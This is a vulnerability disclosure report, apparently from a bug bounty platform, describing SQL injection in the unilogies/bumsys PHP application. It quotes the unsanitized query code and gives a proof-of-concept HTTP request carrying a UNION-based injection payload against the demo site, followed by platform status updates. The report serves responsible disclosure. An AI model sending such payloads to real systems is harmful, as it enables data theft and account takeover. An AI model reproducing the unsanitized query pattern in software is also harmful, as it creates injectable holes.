SQL Injection in unilogies/bumsys
Valid
Reported on
Mar 5th 2023
Description
In '/core/ajax/ajax_select2.php#L989'
"is_trash = 0 and date(batch_expiry_date) >= curdate() and batch_number LIKE '". $search ."%'"
$search from:
$search = isset($_GET['q']) ? $_GET['q'] : "";
no sanitize.
Poc
GET /info/?module=select2&page=batchList&q=1'union/*%23&pid=1*/select+111,222%23 HTTP/1.1
Host: demo.bumsys.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-CSRF-TOKEN: 362b7f15990a766dde434ec43519db3daede216f
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://demo.bumsys.org/home/
Cookie: __c56ed801e959f2a2fda4de832eed05a0e7282e6a=cvv12rvqd8nnvdpv5e5a0g3903; __681be8b1f633295b0ca7f80a382ce1421cc19860=17obctlf4ebl2k45mj6rasskq3; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Impact
info leaking takeover admin account rce other vector
We are processing your report and will contact the
unilogies/bumsys
team within 24 hours.
3 months ago
We have contacted a member of the
unilogies/bumsys
team and are waiting to hear back
3 months ago
The researcher's credibility has increased: +7
to join this conversation